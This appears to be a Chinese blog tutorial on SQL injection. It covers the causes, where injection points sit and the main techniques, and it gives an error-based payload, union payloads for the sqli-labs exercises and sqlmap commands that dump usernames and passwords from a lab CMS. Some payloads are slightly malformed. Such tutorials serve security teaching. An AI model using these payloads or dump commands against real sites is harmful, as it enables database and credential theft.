Web攻防第 02 讲:SQL注入

一、造成SQL注入的原因

  1. 程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句
  2. 为对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中

二、注入点可能存在的位置

  1. GET数据
  2. POST数据
  3. Cookie数据
  4. HTTP头部(HTTP请求报文其他字段)

三、SQL注入存在的危害

      攻击者利用SQL注入漏洞,可以获取数据库中的多种信息(例如:管理员后台的密码),从而脱取数据库中的内容(俗称脱库)。

四、SQL注入四大基本手法

联合注入

报错注入

      在注入点的判断过程中,发现数据库中SQL语句的报错信息,会显示在页面中,因此可以进行报错注入。

报错注入的原理,就是在错误信息中执行SQL语句。出发报错的方式有很多,具体细节也不尽相同。建议直接背公式即可,以下为group by重复建冲突公式。

group by重复建冲突

?id=33 and (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2)x from information_schema.tables group by x)a)

布尔盲注

延时注入

堆叠查询(多语句查询)

五、口诀

是否有回显?                      联合查询

是否有报错?                      报错注入

是否有布尔类型状态?        布尔盲注

绝招                                    延时注入

六、全自动化注入

6.1、半自动化注入工具burp

6.2、全自动化注入工具sqlmap(kali)

参数描述:

-u:检测注入点

--dbs:列出所有数据库的名字

--current-db:列出当前数据库的名字

-D:指定一个数据库名字

--tables:列出表名,结合-D使用

-T:指定表名称

--columns:列出所有的字段名,结合-T,-D使用

-C:指定字段

--dump:列出字段内容

示例:

命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33"

命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" --dbs

命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" --tables

命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" -T "cms_users" --columns

命令:sqlmap -u "http://10.211.55.8/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username, password" --dump

6.3、sqli-lib

6.3.1、字符型注入

单引号

?id=1

?id=1' and 1=2 union select 1, version(), 3 --+

6.3.2、数字型注入

?id=-2 union select 1,2 database()

6.3.3、字符型注入

')

?id=2') and 1=2 union select 1,2 version() --+

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值